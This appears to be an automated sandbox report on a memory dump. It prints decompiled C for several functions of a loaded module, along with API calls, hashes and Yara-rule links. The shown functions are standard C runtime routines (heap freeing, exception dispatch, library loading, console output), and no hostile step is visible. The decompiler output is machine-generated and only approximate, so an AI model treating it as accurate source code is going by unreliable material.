Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: ee11d6b2fe213dca737c59fd41decbce36efa21d53ee10e3308819f878e9e21b
Instruction ID: 1d2b0eec6b7159428b0a0ac771849f0fdd7fe78d1dc1c80f4eecf4aa15ca4e08
Opcode Fuzzy Hash: ee11d6b2fe213dca737c59fd41decbce36efa21d53ee10e3308819f878e9e21b
Instruction Fuzzy Hash: 45314D71600707DFEB219E79EB80B8BB3F9EF01650F28445AE45AD7190DFB1A9E48B11

Uniqueness

Uniqueness Score: -1.00%

Function 732154BD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E732154BD(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x7321dc08;
				if(_t68 != 0x7321dc08) {
					E73215C03(_t68);
					_t36 = _a4;
				}
				E73215C03( *((intOrPtr*)(_t36 + 0x3c)));
				E73215C03( *((intOrPtr*)(_a4 + 0x30)));
				E73215C03( *((intOrPtr*)(_a4 + 0x34)));
				E73215C03( *((intOrPtr*)(_a4 + 0x38)));
				E73215C03( *((intOrPtr*)(_a4 + 0x28)));
				E73215C03( *((intOrPtr*)(_a4 + 0x2c)));
				E73215C03( *((intOrPtr*)(_a4 + 0x40)));
				E73215C03( *((intOrPtr*)(_a4 + 0x44)));
				E73215C03( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E73215305(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E73215366(_t67, _t72, _t73, _t77);
			}

APIs

_free.LIBCMT ref: 732154D3

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 732154DF
_free.LIBCMT ref: 732154EA
_free.LIBCMT ref: 732154F5
_free.LIBCMT ref: 73215500
_free.LIBCMT ref: 7321550B
_free.LIBCMT ref: 73215516
_free.LIBCMT ref: 73215521
_free.LIBCMT ref: 7321552C
_free.LIBCMT ref: 7321553A

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42ba936771a41a3af233d404b7b7398e0761864f3c9a0596032715b5b6ef73d2
Instruction ID: b8a3698cdd26e863128c60c18b12ff3a9e699dccf22ab2734ee6f8872239990d
Opcode Fuzzy Hash: 42ba936771a41a3af233d404b7b7398e0761864f3c9a0596032715b5b6ef73d2
Instruction Fuzzy Hash: 5521ADBA904209AFDB41DF98C940FDE7BF9FF08640F1141A6F5159B121EBB1DAA4DB80

Uniqueness

Uniqueness Score: -1.00%

Function 73213470, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E73213470(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t99;
				void* _t102;
				void* _t103;
				void* _t110;

				_t87 = __edx;
				_push(__ebx);
				_t73 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t73 = E7321C6D0(__ecx,  *_t73);
				_t74 = _a8;
				_t6 = _t74 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t74 + 8) ^  *0x73231004;
				E73213430(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x73231004);
				E73213A17(_a12);
				_t53 = _a4;
				_t103 = _t102 + 0x10;
				_t91 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E73213A00(_t74, 0xfffffffe, _t94, 0x73231004);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t60 = _t91 + (_t91 + 2) * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
							_t61 = _t78 + _t60 * 4;
							_t79 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t80 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t62 = E732139A0(_t79, _t94);
								_t80 = 1;
								_v5 = 1;
								_t110 = _t62;
								if(_t110 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E73213430(_t74, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t110 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x7321d14c;
											if(__eflags != 0) {
												_t69 = E7321C570(__eflags, 0x7321d14c);
												_t103 = _t103 + 4;
												__eflags = _t69;
												if(_t69 != 0) {
													_t98 =  *0x7321d14c; // 0x73213645
													 *0x7321d104(_a4, 1);
													 *_t98();
													_t94 = _v20;
													_t103 = _t103 + 8;
												}
												_t63 = _a4;
											}
										}
										_t88 = _t63;
										E732139E0(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
											_t88 = _t91;
											E73213A00(_t65, _t91, _t94, 0x73231004);
											_t65 = _a8;
										}
										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
										_t66 = E73213430(_t74, _t88, _t91, _t94, _v12);
										E732139C0();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t99, _t94);
										__eflags = _t66;
										if(_t66 != 0) {
											_push(_t94);
											do {
												_t96 =  *_t66;
												E73215091(_t66);
												_t66 = _t96;
												__eflags = _t96;
											} while (_t96 != 0);
											return _t66;
										}
										return _t66;
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t91 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 732134A7
___except_validate_context_record.LIBVCRUNTIME ref: 732134AF
_ValidateLocalCookies.LIBCMT ref: 73213538
__IsNonwritableInCurrentImage.LIBCMT ref: 73213563
_ValidateLocalCookies.LIBCMT ref: 732135B8

Strings

csm, xrefs: 7321354D
D2!s, xrefs: 7321357C

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: D2!s$csm
API String ID: 1170836740-1624946294
Opcode ID: d233cc3bb4c12bc4b105e8c9594e7e0e14edb81dbc9765722738a6315a471e93
Instruction ID: 40a4007da9a26e43b350027815c9d46ee295f00639de5d590cce6f864a0b85ea
Opcode Fuzzy Hash: d233cc3bb4c12bc4b105e8c9594e7e0e14edb81dbc9765722738a6315a471e93
Instruction Fuzzy Hash: 5A412934A04206AFCF01CF15C940B9EBFF6AF49724F148155DA156B385D732DAA1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 73217318, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73217318(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x73232158 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x7321def8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E73215283(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E73215283(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 7321736F
SN!s, xrefs: 7321731A
ext-ms-, xrefs: 73217383

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: SN!s$api-ms-$ext-ms-
API String ID: 0-500871989
Opcode ID: 30ef344301d24bc738b7821dcd6b7507aab3dce2723a69620915edfa27efe421
Instruction ID: 17b905ed7034e43b0af1b707d3e0819c060dc26186d21127cd2dcb2849ca788d
Opcode Fuzzy Hash: 30ef344301d24bc738b7821dcd6b7507aab3dce2723a69620915edfa27efe421
Instruction Fuzzy Hash: 88213873A04227EBD712B62DCF44B5A37EC9F80760F250261ED0AA72C0DB34ECA085E0

Uniqueness

Uniqueness Score: -1.00%

Function 7321A388, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321A388(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E7321A350(_t45, 7);
					E7321A350(_t45 + 0x1c, 7);
					E7321A350(_t45 + 0x38, 0xc);
					E7321A350(_t45 + 0x68, 0xc);
					E7321A350(_t45 + 0x98, 2);
					E73215C03( *((intOrPtr*)(_t45 + 0xa0)));
					E73215C03( *((intOrPtr*)(_t45 + 0xa4)));
					E73215C03( *((intOrPtr*)(_t45 + 0xa8)));
					E7321A350(_t45 + 0xb4, 7);
					E7321A350(_t45 + 0xd0, 7);
					E7321A350(_t45 + 0xec, 0xc);
					E7321A350(_t45 + 0x11c, 0xc);
					E7321A350(_t45 + 0x14c, 2);
					E73215C03( *((intOrPtr*)(_t45 + 0x154)));
					E73215C03( *((intOrPtr*)(_t45 + 0x158)));
					E73215C03( *((intOrPtr*)(_t45 + 0x15c)));
					return E73215C03( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 7321A350: _free.LIBCMT ref: 7321A375

_free.LIBCMT ref: 7321A3D6

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 7321A3E1
_free.LIBCMT ref: 7321A3EC
_free.LIBCMT ref: 7321A440
_free.LIBCMT ref: 7321A44B
_free.LIBCMT ref: 7321A456
_free.LIBCMT ref: 7321A461

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction ID: dc832b041975d1efa4683b4469c0d4dc151a4db45cbd0c0f46cb3cada4ac0c93
Opcode Fuzzy Hash: 5efe60baf44d8ba1c93d5764bc9e0069d11d7209c685432ebbda561d8b9dfbd0
Instruction Fuzzy Hash: 70115871540B05BFF670ABB4CE05FCBB7DC5F05710F444815BA9DA6050DAF6B5A48750

Uniqueness

Uniqueness Score: -1.00%

Function 732147C0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E732147C0(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x7321d104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x732147c6
0x732147ca
0x732147d5
0x732147dd
0x732147e8
0x732147ee
0x732147f2
0x732147f9
0x732147ff
0x732147ff
0x73214801
0x73214806
0x00000000
0x7321480b
0x73214814

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,73214772,?,?,7321473A,?,00000001,?), ref: 732147D5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 732147E8
FreeLibrary.KERNEL32(00000000,?,?,73214772,?,?,7321473A,?,00000001,?), ref: 7321480B

Strings

mscoree.dll, xrefs: 732147CE
CorExitProcess, xrefs: 732147E0
D2!s, xrefs: 732147F9

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$D2!s$mscoree.dll
API String ID: 4061214504-100024862
Opcode ID: 13a031999d0579f6c61ebf6410af72e1332cfb7cff74f784a977b59e6436e63c
Instruction ID: 1348594bb2f27c1d7eddcc7a489f7a4f60635d0d8a50a058fa7f7e49d985ee27
Opcode Fuzzy Hash: 13a031999d0579f6c61ebf6410af72e1332cfb7cff74f784a977b59e6436e63c
Instruction Fuzzy Hash: 44F05E3391012AFBCB01AB51DF09BADBBB8EB00755F208264EC0AA7150DB718E51EA90

Uniqueness

Uniqueness Score: -1.00%

Function 7321949B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E7321949B(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				char _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				signed int _t244;
				intOrPtr _t247;
				signed char _t250;
				signed int _t251;
				signed char _t253;
				struct _OVERLAPPED* _t254;
				intOrPtr _t256;
				void* _t260;
				signed char _t261;
				void* _t262;
				void* _t264;
				long _t266;
				signed int _t269;
				long _t270;
				struct _OVERLAPPED* _t271;
				signed int _t272;
				intOrPtr _t274;
				signed int _t276;
				signed int _t279;
				long _t280;
				long _t281;
				signed char _t282;
				intOrPtr _t283;
				signed int _t284;
				void* _t285;
				void* _t286;

				_t172 =  *0x73231004; // 0xa1a1754f
				_v8 = _t172 ^ _t284;
				_t174 = _a8;
				_t261 = _a12;
				_t272 = (_t174 & 0x0000003f) * 0x38;
				_t244 = _t174 >> 6;
				_v112 = _t261;
				_v84 = _t244;
				_v80 = _t272;
				_t274 = _a16 + _t261;
				_v116 =  *((intOrPtr*)(_t272 +  *((intOrPtr*)(0x73231f50 + _t244 * 4)) + 0x18));
				_v104 = _t274;
				_t178 = GetConsoleCP();
				_t242 = 0;
				_v124 = _t178;
				E7321514C( &_v72, _t261, 0);
				asm("stosd");
				_t247 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t247;
				asm("stosd");
				asm("stosd");
				_t266 = _v112;
				_v40 = _t266;
				if(_t266 >= _t274) {
					L52:
					__eflags = _v60 - _t242;
				} else {
					_t276 = _v92;
					while(1) {
						_v47 =  *_t266;
						_v76 = _t242;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x73231f50 + _v84 * 4));
						_v52 = _t186;
						if(_t247 != 0xfde9) {
							goto L23;
						}
						_t261 = _v80;
						_t212 = _t186 + 0x2e + _t261;
						_t254 = _t242;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t254)) != _t242) {
							_t254 =  &(_t254->Internal);
							if(_t254 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t269 = _v104 - _t213;
						_v44 = _t254;
						if(_t254 <= 0) {
							_t256 =  *((char*)(( *_t213 & 0x000000ff) + 0x73231750)) + 1;
							_v52 = _t256;
							__eflags = _t256 - _t269;
							if(_t256 > _t269) {
								__eflags = _t269;
								if(_t269 <= 0) {
									goto L44;
								} else {
									_t280 = _v40;
									do {
										_t262 = _t242 + _t261;
										_t216 =  *((intOrPtr*)(_t242 + _t280));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e)) = _t216;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									goto L43;
								}
							} else {
								_t270 = _v40;
								__eflags = _t256 - 4;
								_v144 = _t242;
								_t258 =  &_v144;
								_v140 = _t242;
								_v56 = _t270;
								_t219 = (0 | _t256 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t261 + _v52 + 0x2e) & 0x000000ff) + 0x73231750)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t254;
							_v52 = _t229;
							if(_t229 > _t269) {
								__eflags = _t269;
								if(_t269 > 0) {
									_t281 = _v40;
									do {
										_t264 = _t242 + _t261 + _t254;
										_t231 =  *((intOrPtr*)(_t242 + _t281));
										_t242 =  &(_t242->Internal);
										 *((char*)(_t264 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e)) = _t231;
										_t254 = _v44;
										_t261 = _v80;
										__eflags = _t242 - _t269;
									} while (_t242 < _t269);
									L43:
									_t276 = _v92;
								}
								L44:
								_t279 = _t276 + _t269;
								__eflags = _t279;
								L45:
								__eflags = _v60;
								_v92 = _t279;
							} else {
								_t261 = _t242;
								if(_t254 > 0) {
									_t283 = _v108;
									do {
										 *((char*)(_t284 + _t261 - 0xc)) =  *((intOrPtr*)(_t283 + _t261));
										_t261 = _t261 + 1;
									} while (_t261 < _t254);
									_t229 = _v52;
								}
								_t270 = _v40;
								if(_t229 > 0) {
									E73213C30( &_v16 + _t254, _t270, _v52);
									_t254 = _v44;
									_t285 = _t285 + 0xc;
								}
								if(_t254 > 0) {
									_t261 = _v44;
									_t271 = _t242;
									_t282 = _v80;
									do {
										_t260 = _t271 + _t282;
										_t271 =  &(_t271->Internal);
										 *(_t260 +  *((intOrPtr*)(0x73231f50 + _v84 * 4)) + 0x2e) = _t242;
									} while (_t271 < _t261);
									_t270 = _v40;
								}
								_v136 = _t242;
								_v120 =  &_v16;
								_t258 =  &_v136;
								_v132 = _t242;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E7321A0CD(_t258);
								_t286 = _t285 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t266 = _t270 + _v52 - 1;
									L31:
									_t266 = _t266 + 1;
									_v40 = _t266;
									_t193 = E73216F05(_v124, _t242,  &_v76, _v44,  &_v32, 5, _t242, _t242);
									_t285 = _t286 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t242) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t276 = _v88 - _v112 + _t266;
											_v92 = _t276;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t266 >= _v104) {
														goto L52;
													} else {
														_t247 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t242) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t276 = _t276 + 1;
															_v92 = _t276;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t250 = _v80;
						_t261 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
						__eflags = _t261 & 0x00000004;
						if((_t261 & 0x00000004) == 0) {
							_v33 =  *_t266;
							_t188 = E73218214(_t261);
							_t251 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
								_push(1);
								_push(_t266);
								goto L30;
							} else {
								_t202 = _t266 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t261 = _v84;
									_t253 = _v80;
									_t242 = _v33;
									 *((char*)(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2e)) = _v33;
									 *(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x73231f50 + _t261 * 4)) + 0x2d) | 0x00000004;
									_t279 = _t276 + 1;
									goto L45;
								} else {
									_t206 = E732180E1( &_v76, _t266, 2);
									_t286 = _t285 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t266 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_t261 = _t261 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
							_v23 =  *_t266;
							_push(2);
							 *(_t250 + _v52 + 0x2d) = _t261;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E732180E1();
							_t286 = _t285 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t284;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E73212813(_a4, _t242, _v8 ^ _t284, _t261, _a4,  &_v96);
			}

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 732194E3
__fassign.LIBCMT ref: 732196C2
__fassign.LIBCMT ref: 732196DF
WriteFile.KERNEL32(?,73217C8E,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 73219727
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 73219767
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 73219813

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 5884fb64bc49c1943b9e72aa90f74684f6ded8305bff7ac17ab787e574cc3d07
Instruction ID: cf0607fb07045572ae80f15b5dd2fe259bd339c4b469910fa539407b5585d66c
Opcode Fuzzy Hash: 5884fb64bc49c1943b9e72aa90f74684f6ded8305bff7ac17ab787e574cc3d07
Instruction Fuzzy Hash: 3DD19371D0025A9FDF11CFA8CA80AEDBBF6EF49310F284169E416B7245D730A996CF90

Uniqueness

Uniqueness Score: -1.00%

Function 73213AA7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E73213AA7(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x73231020 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E732142FD(_t13, __eflags,  *0x73231020);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E73214338(_t14, __eflags,  *0x73231020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E73215278();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E73214338(_t18, __eflags,  *0x73231020, 0);
								} else {
									_t8 = E73214338(_t18, __eflags,  *0x73231020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E73215091(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,73213615,73212E33,7321284C,?,73212A84,?,00000001,?,?,00000001,?,7322FAB8,0000000C,73212B7D), ref: 73213AB5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 73213AC3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 73213ADC
SetLastError.KERNEL32(00000000,73212A84,?,00000001,?,?,00000001,?,7322FAB8,0000000C,73212B7D,?,00000001,?), ref: 73213B2E

Memory Dump Source

